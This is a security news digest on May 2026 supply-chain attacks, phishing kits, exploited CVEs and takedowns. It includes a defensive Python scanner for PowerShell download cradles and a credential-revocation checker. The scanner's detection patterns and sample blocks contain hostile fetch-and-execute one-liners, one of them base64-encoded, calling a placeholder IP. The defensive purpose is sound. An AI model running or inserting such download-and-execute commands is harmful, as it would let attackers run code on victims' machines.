News Summary

Last updated: 16:45 23/05/2026 UTC
Last updated: 17:00 23/05/2026 UTC
  • OpenAI, TanStack, and Mistral AI Impacted in Escalating Mini Shai-Hulud Supply Chain Campaign The Mini Shai-Hulud supply chain campaign has escalated with a new wave of 639 compromised npm packages tied to the AntV ecosystem, including high-download dependencies such as echarts-for-react and timeago.js. The attack ran for roughly one hour on May 19, 2026, beginning at 01:56 UTC, publishing malicious versions from the compromised “atool” maintainer account that held rights for over 500 packages. Each compromised package added an obfuscated Bun bundle preinstall hook to harvest and exfiltrate credentials (cloud, CI/CD, SSH, Kubernetes, and password manager vaults) via GitHub repositories marked with Dune-themed names and the campaign's reversed signature. Earlier waves targeted TanStack and Mistral AI SDKs, SAP npm packages, and PyPI ecosystems (Lightning, intercom-client), while compromising GitHub Actions workflows ('actions-cool/issues-helper', 'actions-cool/maintain-one-comment') and hundreds of npm packages across multiple ecosystems. Affected organizations include OpenAI (two employee devices breached via TanStack), UiPath, Guardrails AI, OpenSearch, SAP, and hundreds of npm and PyPI packages. The malware harvests over 20 credential types, abuses OIDC tokens to forge Sigstore provenance attestations, implements self-propagation via stolen npm tokens, and includes a destructive sabotage payload targeting systems in Israel or Iran. The campaign is attributed to TeamPCP, which publicly released the Shai-Hulud source code, enabling rapid cloning and weaponization by other actors.
  • Widespread OAuth Device Code Phishing Campaign Targets Microsoft 365 via EvilTokens PhaaS Since mid-February 2026, a large-scale device code phishing campaign has targeted Microsoft 365 across at least 340 organizations in over 10 countries, escalating 37.5x in early April. The campaign abuses OAuth device authorization flows via the EvilTokens PhaaS platform and at least 10 additional phishing kits (VENOM, DOCUPOLL, SHAREFILE, etc.), granting persistent access tokens even after password resets. Attacks incorporate anti-bot evasion, multi-hop redirect chains via vendor services, and SaaS-themed lures, while mitigation focuses on disabling device code flows and monitoring anomalous authentications. Credential exposures like the Figure breach (967,200 email records) enable follow-on campaigns—credential stuffing, AI-generated phishing, and help desk social engineering—that bypass legacy MFA through real-time phishing relays and social engineering. Legacy MFA and even FIDO2 passkeys are structurally unable to prevent these attacks, which rely on human judgment at critical control points. Phishing-resistant authentication requires cryptographic origin binding, hardware-bound keys, and live biometric verification to close relay and delegation vectors. New research emphasizes how EvilTokens and similar kits exploit OAuth consent screens to trick users into granting scoped refresh tokens, bypassing MFA entirely and maintaining persistence even after password resets. The attack vector, termed consent phishing or OAuth grant abuse, operates below traditional identity controls, with refresh tokens surviving tenant policy changes unless explicitly revoked. The article also highlights the rise of 'toxic combinations'—unauthorized bridges between SaaS applications via OAuth grants—that create interconnected risk surfaces, exemplified by the 2025 Salesloft-Drift incident. Mitigation strategies now include platforms like Reco that map OAuth grants and AI agents into identity graphs, enabling continuous monitoring and token-level revocation to address these emergent attack pathways.
  • Upcoming webinar on automating and coordinating network incident response workflows A live webinar scheduled for June 2, 2026, will address systemic gaps in network incident response workflows that exacerbate incident escalation despite existing monitoring and security tooling. The session, titled "From alert to resolution: Fixing the gaps in network incident response," is hosted by BleepingComputer in partnership with Tines and will be presented by Edgar Ortiz, a Solutions Engineering Leader and Computer Scientist at Tines. It highlights how reliance on manual triage, alert routing, and coordination across disparate systems—rather than visibility limitations—drives incident escalation and service disruption during high-pressure scenarios.
  • Unsanctioned AI Tool Usage in Enterprises Over 80% of employees now use unapproved generative AI applications at work, with only 12% of companies maintaining formal AI governance policies. Shadow AI activity primarily occurs through OAuth connections to corporate data, browser extensions, and AI features embedded in pre-approved tools. This unsanctioned usage bypasses traditional security controls, creating significant governance and data exposure risks. Enterprises struggle to balance productivity with security, as employees adopt AI tools 3–5 times daily without IT oversight. The EU AI Act’s mandate for AI system visibility has intensified the need for continuous monitoring and risk assessments. Solutions like Harmonic Security’s platform enable enterprises to enforce smart governance policies based on data sensitivity, employee roles, and tool nature, addressing the operational realities highlighted by recent research.
  • Tycoon2FA Phishing-as-a-Service Takedown Tycoon2FA, a subscription-based phishing-as-a-service (PhaaS) platform that bypasses MFA using adversary-in-the-middle techniques, has expanded its capabilities to include device-code phishing attacks targeting Microsoft 365 accounts via OAuth 2.0 device authorization grant flows. The platform, active since August 2023, offers subscription-based access for bypassing multi-factor authentication, targeting major services like Microsoft 365 and Google. It was linked to over 64,000 phishing incidents and facilitated unauthorized access to nearly 100,000 organizations globally by mid-2025. The primary operator, identified as 'SaaadFridi' and 'Mr_Xaad,' remains at large. The platform’s infrastructure relies on adversary-in-the-middle techniques, AI-generated decoy pages, and short-lived domains to evade detection, while customers employ tactics like ATO Jumping to distribute phishing URLs. The platform was disrupted in a March 4, 2026 global takedown led by Europol’s EC3 and law enforcement from six European countries, but rapidly resumed operations within days to pre-disruption levels. Post-disruption, Tycoon2FA operators have continued to develop the kit, adding device-code phishing capabilities that abuse Trustifi click-tracking URLs and OAuth 2.0 flows. The phishing kit now includes a four-layer in-browser delivery chain, fake Microsoft CAPTCHA pages, and extensive anti-analysis protections to evade detection and analysis. Post-compromise activities include business email compromise (BEC), email thread hijacking, cloud account takeovers, and malicious SharePoint links, with old infrastructure remaining active and new domains registered quickly.

Latest updates


npm enforces staged package publishing with 2FA approval and install source controls

Updated: · First: 23.05.2026 19:35 · 📰 1 src / 1 articles

npm introduced staged publishing, which requires maintainers to approve package releases via two-factor authentication (2FA) before they become publicly available, providing proof of presence for every publish, including those from CI/CD and OIDC workflows. Additionally, npm added three new install source flags (--allow-file, --allow-remote, --allow-directory) to explicitly control non-registry install sources, replacing the single --allow-git flag. These measures target ongoing supply chain attack campaigns, such as those attributed to TeamPCP, which have escalated in open-source ecosystems.

Malicious Laravel Packages Deploy Cross-Platform RAT via Packagist

Updated: 23.05.2026 19:07 · First: 04.03.2026 11:37 · 📰 2 src / 2 articles

Malicious PHP packages on Packagist, disguised as Laravel utilities, deploy a cross-platform remote access trojan (RAT) affecting Windows, macOS, and Linux systems. Eight additional packages were distributed in a coordinated supply chain attack targeting projects with JavaScript build tooling, inserting malicious postinstall scripts in package.json to download and execute a Linux binary from GitHub. The packages 'nhattuanbl/lara-helper', 'nhattuanbl/simple-queue', and 'nhattuanbl/lara-swagger' contain obfuscated PHP code that connects to a C2 server, enabling full remote access to compromised hosts. The RAT supports commands like system reconnaissance, shell execution, and file operations, and runs in the same process as the web application, granting full remote shell access.

CINEMAGOAL piracy operation dismantled after mass account takeovers via stolen streaming auth codes

Updated: · First: 23.05.2026 17:23 · 📰 1 src / 1 articles

Italian authorities have dismantled the CINEMAGOAL piracy operation that used a rogue app to harvest and redistribute authentication codes for major streaming platforms such as Netflix, Disney+, and Spotify. The operation involved over 100 searches, seizures in Italy, France, and Germany, and the identification of 70+ resellers. The system evaded platform blocks by proxying through legitimate services using virtual machines and false identities, causing an estimated €300M in damages. Authorities have begun issuing penalties to identified subscribers and continue analyzing seized data to trace financial flows and additional actors.

Claude Mythos uncovers thousands of zero-days across major systems via Project Glasswing

Updated: 23.05.2026 14:55 · First: 08.04.2026 12:16 · 📰 5 src / 5 articles

Anthropic’s Project Glasswing, powered by the Claude Mythos Preview model, has now identified over 10,000 high- or critical-severity vulnerabilities across widely used software since its launch a month prior, including 6,202 high/critical flaws affecting more than 1,000 open-source projects. Anthropic reports that 1,726 of these candidates have been confirmed as true positives, with 1,094 assessed as high or critical severity. Critical fixes include a WolfSSL certificate forgery flaw (CVE-2026-5194, CVSS 9.1), and 97 vulnerabilities have already been patched upstream with 88 advisories issued. While Mythos Preview demonstrates unprecedented offensive security capabilities—such as autonomously crafting attack chains and detecting real-time fraud like a $1.5 million wire transfer attempt—99% of its discovered vulnerabilities remain unpatched as of May 2026. The model’s rapid vulnerability discovery is reshaping patch cycles, with vendors like Microsoft anticipating sustained increases in monthly patches, and Anthropic urging organizations to accelerate hardening, MFA enforcement, and log retention to mitigate escalating dual-use risks.

Underminr CDN Misrouting Vulnerability Exploited to Conceal Malicious Traffic via Shared Edge Infrastructure

Updated: · First: 23.05.2026 14:00 · 📰 1 src / 1 articles

Threat actors are actively exploiting a vulnerability in shared content delivery network (CDN) infrastructure, dubbed Underminr, to conceal malicious connections behind trusted domains. The technique abuses CDN tenant routing misconfigurations by presenting the Server Name Indication (SNI) and HTTP Host header of a reputable domain while forcing a connection to the IP address of another tenant on the same shared edge infrastructure. This mismatch allows traffic to bypass network policies and appear legitimate, enabling evasion of protective DNS services and egress filtering. Underminr has been observed in attacks targeting large-scale hosting providers, including those that previously mitigated domain fronting, and is being used to hide command-and-control (C2) communications, VPN connections, and proxy traffic. The vulnerability impacts approximately 88 million domains globally, with the highest concentrations in the US, UK, and Canada.

Compromise of Laravel-Lang PHP Packages Results in Cross-Platform Credential Stealer Deployment via Supply Chain Attack

Updated: · First: 23.05.2026 12:51 · 📰 1 src / 1 articles

A coordinated supply chain compromise has affected multiple Laravel-Lang PHP packages—including laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/attributes, and laravel-lang/actions—resulting in the delivery of a multi-platform credential-stealing framework. The attack involved over 700 compromised package versions published within seconds of each other on May 22–23, 2026, suggesting automated mass tagging after likely compromise of organization-level credentials or release infrastructure. A malicious backdoor embedded in src/helpers.php executes automatically via Composer’s autoload.files mechanism on every PHP request in infected applications. The dropper retrieves a PHP-based cross-platform payload from flipboxstudio.info, which deploys platform-specific stealers: a Visual Basic Script on Windows (executed via cscript), and shell execution on Linux/macOS. The malware performs extensive credential harvesting across cloud providers, CI/CD systems, version control, cryptocurrency wallets, browsers, password managers, VPNs, and application tokens (e.g., Discord, Slack, Outlook, FileZilla), before exfiltrating encrypted data to flipboxstudio.info and self-deleting.

Privilege escalation in LiteSpeed cPanel plugin via redisAble function exploited in the wild

Updated: · First: 23.05.2026 10:35 · 📰 1 src / 1 articles

A maximum-severity (CVSS 10.0) privilege escalation vulnerability in the LiteSpeed User-End cPanel Plugin (CVE-2026-48172) is actively exploited to execute arbitrary scripts as the root user. The flaw arises from incorrect privilege assignment in the lsws.redisAble function, enabling any authenticated cPanel user—including attackers or compromised accounts—to gain root-level code execution. The issue affects plugin versions 2.3 through 2.4.4; WHM plugin versions are not impacted. Patches are available in cPanel plugin v2.4.7 (bundled with WHM v5.3.1.0).

Drupal Core SQL Injection Vulnerability (CVE-2026-9082) Actively Exploited in the Wild

Updated: · First: 23.05.2026 10:23 · 📰 1 src / 1 articles

A critical SQL injection vulnerability in Drupal Core (CVE-2026-9082, CVSS 6.5) has been confirmed as actively exploited in the wild, prompting CISA to add it to the Known Exploited Vulnerabilities (KEV) catalog. The flaw affects all supported Drupal Core versions, enabling privilege escalation and potential remote code execution via specially crafted requests leveraging the database abstraction API. Attackers are probing and targeting vulnerable PostgreSQL-backed Drupal sites, with observed activity concentrated in gaming and financial services sectors across 65 countries. Federal agencies have been directed to apply patches by May 27, 2026.

Global law enforcement operation dismantles criminal VPN service used by 25 ransomware groups

Updated: · First: 22.05.2026 20:35 · 📰 1 src / 1 articles

A coordinated international law enforcement operation dismantled First VPN Service, a criminal-focused VPN infrastructure leveraged by at least 25 ransomware groups, threat actors, and cybercriminals for anonymizing malicious activities including ransomware attacks, data theft, network reconnaissance, and denial-of-service operations. The takedown spanned May 19–20, 2026 and involved authorities from 21 countries, including France, the Netherlands, Ukraine, the U.S., and the U.K., under operations led by Europol and Eurojust. The service, active since 2014, provided 32 exit nodes across 27 countries and promoted itself on Russian-speaking cybercrime forums such as Exploit[.]in and XSS[.]is as an anonymity tool resistant to law enforcement cooperation. Impact includes the seizure of 33 servers, interviews with the service administrator, and disruption of infrastructure supporting global cybercrime operations. The FBI confirmed the service’s role in enabling multiple ransomware operations, including Avaddon Ransomware.

AWS GovCloud administrative credentials exposed via contractor-managed public GitHub repository

Updated: 22.05.2026 19:34 · First: 18.05.2026 23:48 · 📰 2 src / 2 articles

A CISA contractor exposed credentials for AWS GovCloud accounts and internal systems via a public GitHub repository named "Private-CISA", enabling potential lateral movement within CISA’s networks. The exposure, first reported by GitGuardian on May 15, 2026, included plaintext passwords, cloud keys, tokens, and software deployment details. The repository was taken offline promptly, but exposed AWS keys remained valid for 48 hours, and CISA has stated there is no indication of sensitive data compromise. Lawmakers have since demanded answers from CISA, citing concerns over internal security culture and contractor oversight, particularly amid significant workforce disruptions at the agency. Reports indicate CISA struggled to fully invalidate exposed credentials for over a week, with evidence suggesting adversaries may have accessed the secrets. An RSA private key in the repository granted full access to CISA’s GitHub enterprise account until its recent revocation.

UAC-0050 Targets European Financial Institution with Spoofed Domain and RMS Malware

Updated: 22.05.2026 19:20 · First: 24.02.2026 16:21 · 📰 2 src / 2 articles

UAC-0050 continues to target European financial institutions with spear-phishing and RMS malware to establish persistent access. Concurrently, Russia-aligned operations such as Ghostwriter (UAC-0057/UNC1151) have intensified phishing campaigns against Ukrainian government entities since spring 2026, using Prometheus-themed lures and sophisticated multi-stage payloads like OYSTERFRESH, OYSTERBLUES, and Cobalt Strike. Ukraine’s National Security and Defense Council also reported increased Russian use of AI tools (e.g., ChatGPT, Google Gemini) for target reconnaissance and malware runtime command generation, alongside broader Kremlin-backed campaigns focused on intelligence gathering, long-term network persistence, and influence operations. These activities align with prior reporting on Russia-nexus adversaries targeting Ukrainian entities and NATO member states, including the deployment of legitimate remote access tools like RMS by UAC-0050.

Zscaler Acquires SquareX to Enhance Browser Security

Updated: 22.05.2026 18:43 · First: 06.02.2026 04:48 · 📰 3 src / 5 articles

In May 2026, Zscaler completed its acquisition of SquareX, formally integrating the Browser Detection and Response (BDR) solution into the Zero Trust Exchange platform to secure unmanaged devices via user-preferred browsers. SquareX’s extension, which converts standard browsers into enterprise-grade secure workspaces with real-time threat detection, remains a standalone offering while being incorporated into Zscaler’s broader strategy. The move, alongside concurrent industry consolidation, reflects growing enterprise adoption of secure browsers amid rising threats to browser-based activities, including malicious extensions, phishing, and AI tool interactions. Gartner projects adoption of secure enterprise browsers to rise from 10% to 25% of organizations by 2028, underscoring the sector’s rapid evolution.

Former executives convicted for facilitating large-scale tech support fraud operations spanning 2017–2022

Updated: · First: 22.05.2026 18:32 · 📰 1 src / 1 articles

Two former executives of a call-tracking and analytics company pleaded guilty to concealing a years-long tech support fraud scheme that targeted individuals globally. Former CEO Adam Young and former CSO Harrison Gevirtz admitted to misprision of a felony and are scheduled for sentencing on June 16. They operated C.A. Cloud Attribution, Ltd. between early 2017 and April 2022, providing services including telephone numbers, call recordings, and call forwarding to known fraudsters. The fraud schemes involved deceptive pop-up ads falsely claiming system infections, directing victims to call centers charging hundreds of dollars for fictitious technical services. Some scammers remotely accessed victims' computers and stole personal and financial information to withdraw funds without authorization. Young and Gevirtz allegedly advised customers to use rotating telephone numbers to reduce complaints and prevent account terminations, and introduced fraudsters to one another.

Medium-severity Apex One zero-day patched after exploitation in on-premises deployments

Updated: 22.05.2026 16:39 · First: 22.05.2026 11:19 · 📰 2 src / 2 articles

Trend Micro patched CVE-2026-34926, a medium-severity directory traversal flaw in Apex One on-premises installations, after confirming in-the-wild exploitation targeting Windows systems. The vulnerability allowed local attackers with admin credentials to inject malicious code into server key tables and deploy payloads to agents. CISA added the CVE to its Known Exploited Vulnerabilities (KEV) catalog on May 22, 2026, requiring federal agencies to remediate by June 4, 2026. Concurrently, Trend Micro released updates addressing seven local privilege escalation vulnerabilities in the Apex One Standard Endpoint Protection agent. Threat actors have repeatedly exploited Apex One flaws in zero-day attacks, including prior incidents tracked as CVE-2025-54948 (August 2025), CVE-2022-40139 (September 2022), and CVE-2023-41179 (September 2023).

Evolving AI-Fueled Social Engineering Surge Targets Healthcare Sector

Updated: · First: 22.05.2026 16:17 · 📰 1 src / 1 articles

Healthcare organizations experienced a notable increase in sophisticated social engineering attacks in 2025, driven by AI-enhanced pretexting and phishing tactics that exploit operational urgency and trust in clinical workflows. Threat actors leveraged generative AI to craft highly targeted, context-aware communications and malicious documents, impersonating executives, vendors, and HR to manipulate healthcare professionals into divulging credentials or enabling session hijacking. The attacks align with long-standing industry vulnerabilities, including legacy systems, high-value data (e.g., patient records), and fragmented supplier ecosystems. The Verizon 2026 Data Breach Investigations Report (DBIR) identifies social engineering as a top three breach pattern in healthcare, alongside system intrusion and miscellaneous errors, collectively accounting for 81% of incidents. Pretexting—previously absent from DBIR healthcare data—now ranks as the second most common social action in healthcare breaches, reflecting a shift toward credibility-driven deception over traditional urgency-based lures.

PostgreSQL-targeting SQL injection in Drupal Core enables remote code execution

Updated: 22.05.2026 16:14 · First: 21.05.2026 06:44 · 📰 2 src / 2 articles

On May 22, 2026, Drupal confirmed active exploitation of CVE-2026-9082, a critical SQL injection vulnerability in Drupal Core’s database abstraction API that enables unauthenticated attackers to execute arbitrary SQL commands on PostgreSQL-backed sites. The flaw can lead to remote code execution, privilege escalation, or information disclosure without authentication. Patches have been issued for active Drupal branches (10.4–11.3) and manual fixes provided for end-of-life versions (8.9, 9.5). Drupal rated the risk internally as highly critical (23/25), though NIST assigned a CVSS v3 score of 6.5 (medium severity). Administrators are urged to update immediately, including those using non-PostgreSQL configurations due to upstream dependency fixes.

Expansion of fraud impact metrics beyond chargeback rates in enterprise risk programs

Updated: · First: 22.05.2026 16:09 · 📰 1 src / 1 articles

Organizations are broadening fraud measurement beyond traditional chargeback rates to include operational, reputational, and growth-related impacts as fraud techniques evolve. Emerging patterns such as account takeovers and synthetic identity fraud are driving indirect losses, customer churn, and operational overhead that are not captured by chargeback metrics. This shift reflects growing recognition that fraud prevention strategies must balance risk reduction with customer experience and revenue protection.

Kimwolf Botmaster 'Dort' Linked to Cybercrime Activities

Updated: 22.05.2026 15:11 · First: 28.02.2026 14:01 · 📰 3 src / 3 articles

Jacob Butler, a 23-year-old Canadian living in Ottawa, has been arrested for operating the Kimwolf DDoS botnet, an Android-focused successor to the Aisuru botnet. Butler, known online as 'Dort,' faces a US charge of aiding and abetting computer intrusion, which carries up to 10 years in prison on conviction. The botnet enslaved roughly 2 million devices, mostly Android-based consumer hardware such as digital photo frames and web cameras that would normally sit behind a firewall; Kimwolf reached those devices through residential proxy networks, which is how it grew so large. It was run as a cybercrime-as-a-service operation, selling DDoS attacks, including against Department of Defense IP addresses, that peaked at 31.4 Tbps. Kimwolf emerged after a vulnerability was disclosed in January 2026 and became the largest and most disruptive botnet seen to date. Butler has been linked to cybercrime dating back to at least 2017, including DDoS attacks, doxing, email flooding, and ties to the LAPSUS$ group; investigators also tied him to Minecraft cheating software, CAPTCHA bypass tools, and temporary email services. On March 11, 2026, authorities in Canada and Germany disrupted Kimwolf and Aisuru in a coordinated operation, though no arrests were disclosed at the time. The US Justice Department later announced Butler's arrest in Ottawa and unsealed seizure warrants for 45 DDoS-for-hire platforms, including one that collaborated with Kimwolf.

Infostealer campaign abuses fake Google Gemini and Anthropic Claude Code sites in SEO poisoning attacks

Updated: · First: 22.05.2026 14:30 · 📰 1 src / 1 articles

A threat actor launched an SEO poisoning campaign in early 2026, creating fake websites impersonating Google's Gemini CLI and Anthropic's Claude Code to distribute an in-memory infostealer aimed at Windows developers and enterprise users. Victims searching for the legitimate AI coding tools were steered by SEO manipulation to malicious domains that mimic the official installation pages. Users who pasted the PowerShell commands shown on those pages into a terminal unknowingly ran an infostealer that harvests browser credentials, session cookies, collaboration platform data, cryptocurrency wallet details, cloud storage files, and system metadata, all exfiltrated to attacker-controlled command-and-control (C2) servers. The campaign shows a deliberate focus on developer workstations and enterprise environments, and its domain naming patterns (.co.uk, .us.com, .us.org) suggest geographic targeting of the US and UK.
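The campaign's initial access step is a user pasting a PowerShell command into a terminal, so the detection opportunity is in PowerShell script-block logging rather than in any binary on disk. The following is an added example, not code from the article or from the campaign it describes: it scans script-block text (for instance the ScriptBlockText field of Microsoft-Windows-PowerShell/Operational event 4104, exported one block per line) for the command shapes copy-and-paste "installers" rely on, decoding `-EncodedCommand` payloads first so the inner script is scanned too. The sample blocks and the 203.0.113.10 address are constructed for the example, and the indicator weights and the `scan_log` threshold are this example's own rough scale, not a published scoring scheme.

```python
"""Flag paste-and-run PowerShell download cradles in script-block log text.

Added example, not code from the article or from the campaign it describes.
Sample blocks, the 203.0.113.10 address and the indicator weights are all
constructed for this example.
"""
import base64
import re
from dataclasses import dataclass, field

# (name, weight, pattern). A lone download scores low; download + in-memory
# execution + hidden window + policy bypass is the copy-paste cradle shape.
INDICATORS = [
    ("web_fetch", 2, re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
        r"downloadfile|net\.webclient|start-bitstransfer|curl|wget)\b", re.I)),
    ("in_memory_exec", 3, re.compile(
        r"\b(?:iex|invoke-expression)\b|\[(?:system\.)?reflection\.assembly\]::load", re.I)),
    ("hidden_window", 1, re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)),
    ("policy_bypass", 1, re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass\b", re.I)),
    ("encoded_command", 2, re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("ip_literal_url", 1, re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\b", re.I)),
]

# -EncodedCommand takes base64 of the UTF-16LE script text.
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_commands(text: str) -> list:
    """Return the decoded script of every -EncodedCommand argument found in `text`."""
    decoded = []
    for b64 in ENCODED_RE.findall(text):
        try:
            decoded.append(base64.b64decode(b64, validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not real base64 / UTF-16: the raw text is still scanned
    return decoded


@dataclass
class Finding:
    line_no: int
    score: int = 0
    hits: list = field(default_factory=list)
    decoded: list = field(default_factory=list)


def scan_block(line_no: int, text: str) -> Finding:
    """Score one script block; decoded -EncodedCommand payloads are scanned alongside it."""
    finding = Finding(line_no=line_no, decoded=decode_encoded_commands(text))
    haystack = text + "\n" + "\n".join(finding.decoded)
    for name, weight, pattern in INDICATORS:
        if pattern.search(haystack):
            finding.hits.append(name)
            finding.score += weight
    return finding


def scan_log(lines, threshold: int = 4) -> list:
    """Return the findings at or above `threshold`, one per offending script block."""
    findings = []
    for line_no, text in enumerate(lines, 1):
        finding = scan_block(line_no, text)
        if finding.score >= threshold:
            findings.append(finding)
    return findings


def _encode_ps(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed script blocks standing in for exported 4104 events.
SAMPLE_SCRIPT_BLOCKS = [
    # 1: ordinary admin activity
    r"Get-ChildItem C:\Projects -Recurse | Where-Object { $_.Length -gt 1MB }",
    # 2: a download on its own: worth a look, but not a cradle by itself
    "Invoke-WebRequest https://example.invalid/tool.zip -OutFile tool.zip",
    # 3: the copy-paste installer shape: hidden window, policy bypass, fetch-and-eval
    'powershell -w hidden -ep bypass -c "iex (irm https://203.0.113.10/setup.ps1)"',
    # 4: the same thing hidden behind -EncodedCommand
    "powershell.exe -nop -w hidden -enc " + _encode_ps(
        "IEX (New-Object Net.WebClient).DownloadString('https://203.0.113.10/a')"),
]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {f.line_no}: score {f.score} {f.hits}")
```

Blocks 3 and 4 are reported (scores 8 and 9); block 2 scores 2 and stays below the threshold, which is the point of weighting: a download alone is common in developer workflows, a download fed straight into `iex` from a hidden window is not.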

Apple’s App Store fraud prevention efforts block over $11B in six years with $2.2B in 2025 alone

Updated: 22.05.2026 13:30 · First: 21.05.2026 18:11 · 📰 2 src / 2 articles

Apple’s fraud prevention efforts have now cumulatively blocked over $11.2 billion in App Store fraud over six years, including more than $2.2 billion in 2025 alone. The company terminated 193,000 developer accounts, rejected 138,000 enrollments, and deactivated 40.4 million customer accounts due to fraud or abuse in 2025. It also blocked 5.4 million stolen credit cards and banned nearly 2 million user accounts from further transactions. Enforcement expanded through AI-driven detection models, the blocking of 1.1 billion fraudulent account creations, and takedowns of 28,000 illegitimate apps on pirate storefronts.

KEV catalog update includes Langflow RCE and Trend Micro Apex One directory traversal flaws under active exploitation

Updated: · First: 22.05.2026 08:47 · 📰 1 src / 1 articles

CISA added two vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, citing active exploitation: CVE-2025-34291 in Langflow and CVE-2026-34926 in Trend Micro Apex One. CVE-2025-34291 (CVSS 9.4) is an origin validation error that enables arbitrary code execution and full system compromise, exposing the sensitive tokens Langflow stores and enabling cascading compromise of the services it integrates with. CVE-2026-34926 (CVSS 6.7) is a directory traversal flaw in on-premises Apex One that lets a local attacker who already holds administrative access to the server inject malicious code that is then deployed to agents. MuddyWater, an Iranian threat actor, has used CVE-2025-34291 for initial access, and Trend Micro has observed in-the-wild exploitation attempts against CVE-2026-34926. FCEB agencies must remediate both by June 4, 2026.

Critical REST API Vulnerability in Cisco Secure Workload Allows Unauthenticated Data Access and Privilege Escalation

Updated: · First: 22.05.2026 08:36 · 📰 1 src / 1 articles

A critical, unauthenticated REST API vulnerability (CVE-2026-20223, CVSS 10.0) in Cisco Secure Workload enables remote attackers to read sensitive data and modify configurations across tenant boundaries with Site Admin privileges. The flaw affects both SaaS and on-prem deployments across multiple software releases, with no available workarounds. Exploitation requires crafting a malicious API request to a vulnerable endpoint, posing significant risk to network isolation and data confidentiality.

Agentic AI Supply Chain Risk Management Evolves with Runtime Authority Tracking Requirements

Updated: · First: 22.05.2026 00:11 · 📰 1 src / 1 articles

New guidance emphasizes extending AI Bills of Materials (AI BOMs) to include runtime behavior and delegated authority for autonomous AI agents, addressing critical gaps in traditional artifact-lineage documentation. The shift reflects the rise of agentic AI systems that perform actions beyond static model/data composition, introducing dynamic supply chain risks tied to execution context, tool permissions, and decision propagation. Organizations are urged to adopt agentic-ready AI BOM frameworks to prevent incidents like unchecked AI agents deleting production databases due to authorization failures.

Google Cloud Platform API Key Revocation Delays Beyond UI Confirmation

Updated: · First: 21.05.2026 23:07 · 📰 1 src / 1 articles

Research from Aikido Security shows that Google Cloud Platform (GCP) API keys keep working for a median of 16 minutes, and up to 23 minutes, after they are deleted, leaving a window in which a deleted credential can still be used. The delay varies markedly by region: within the first minute after deletion, authentication with the deleted key succeeded anywhere from 5% to 79% of the time. An attacker holding a deleted key can keep making authenticated requests until Google's infrastructure has propagated the revocation, for example pulling data through any API the key can reach, such as Gemini. The GCP console reports the key as deleted immediately, so teams may believe the exposure is closed while the key still authenticates; revocation should be verified by probing rather than assumed from the console.
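The practical consequence for a rotation runbook is to treat "deleted" in the console as the start of revocation, not the end, and to keep probing the old credential until it fails consistently. The following is an added example, not code from the Aikido research or from Google's tooling. `probe` is any cheap authenticated call the credential can still make (for a GCP API key, a request to one of the APIs the key is allowed to call, with the key attached); it is injected so the example runs offline against a constructed backend whose edges learn about the deletion at different times, which is what a regional propagation delay looks like from the client side. The edge delays in `demo` (1, 16 and 23 minutes) are chosen to mirror the numbers in the finding and are not measurements.

```python
"""Verify that a deleted or revoked credential has actually stopped working.

Added example; not from the Aikido research or from Google's tooling. The
simulated backend, its edge delays and the fake clock are constructed so the
example runs offline and deterministically.
"""
import time
from dataclasses import dataclass
from typing import Callable, Optional


@dataclass
class RevocationResult:
    revoked: bool                            # False: still accepted when we gave up
    seconds_until_revoked: Optional[float]   # elapsed when rejections became consistent
    last_accepted_at: Optional[float]        # elapsed of the last probe still accepted
    attempts: int
    accepted: int                            # probes accepted after the delete call


def wait_for_revocation(
    probe: Callable[[], bool],
    *,
    timeout_s: float = 1800.0,
    interval_s: float = 5.0,
    consecutive_failures_required: int = 3,
    clock: Callable[[], float] = time.monotonic,
    sleep: Callable[[float], None] = time.sleep,
) -> RevocationResult:
    """Poll probe() (True = credential still accepted) until it has been rejected
    `consecutive_failures_required` times in a row, or until timeout_s elapses.

    Several consecutive rejections are required because propagation is not
    atomic: one edge rejecting the key says nothing about the others, and a
    single failed probe can also be a transient error rather than revocation.
    """
    start = clock()
    attempts = accepted = streak = 0
    last_accepted_at: Optional[float] = None
    while True:
        now = clock()
        attempts += 1
        if probe():
            accepted += 1
            streak = 0
            last_accepted_at = now - start
        else:
            streak += 1
            if streak >= consecutive_failures_required:
                return RevocationResult(True, now - start, last_accepted_at, attempts, accepted)
        if now - start >= timeout_s:
            return RevocationResult(False, None, last_accepted_at, attempts, accepted)
        sleep(interval_s)


class FakeClock:
    """Deterministic clock so the example runs instantly; use time.monotonic/time.sleep for real runs."""

    def __init__(self) -> None:
        self.t = 0.0

    def now(self) -> float:
        return self.t

    def sleep(self, seconds: float) -> None:
        self.t += seconds


class SimulatedKeyBackend:
    """Constructed stand-in for an API front end with several edges. Each edge keeps
    accepting the key for its own delay after delete_key(); probes are spread
    round-robin over the edges, as a client behind anycast or a load balancer sees it."""

    def __init__(self, edge_delays_s, clock: Callable[[], float]) -> None:
        self.edge_delays_s = list(edge_delays_s)
        self.clock = clock
        self.deleted_at: Optional[float] = None
        self._next_edge = 0

    def delete_key(self) -> None:
        self.deleted_at = self.clock()   # the instant the console would report "deleted"

    def probe(self) -> bool:
        edge = self._next_edge % len(self.edge_delays_s)
        self._next_edge += 1
        if self.deleted_at is None:
            return True
        return self.clock() - self.deleted_at < self.edge_delays_s[edge]


def demo(edge_delays_s=(60.0, 960.0, 1380.0), interval_s=30.0, timeout_s=1800.0) -> RevocationResult:
    """Delete a key on the simulated backend and measure how long it stays usable."""
    clock = FakeClock()
    backend = SimulatedKeyBackend(edge_delays_s, clock.now)
    backend.delete_key()
    return wait_for_revocation(backend.probe, timeout_s=timeout_s, interval_s=interval_s,
                               clock=clock.now, sleep=clock.sleep)


if __name__ == "__main__":
    r = demo()
    print(f"revoked={r.revoked} after {r.seconds_until_revoked:.0f}s; "
          f"last accepted at {r.last_accepted_at:.0f}s; {r.accepted}/{r.attempts} probes accepted")
```

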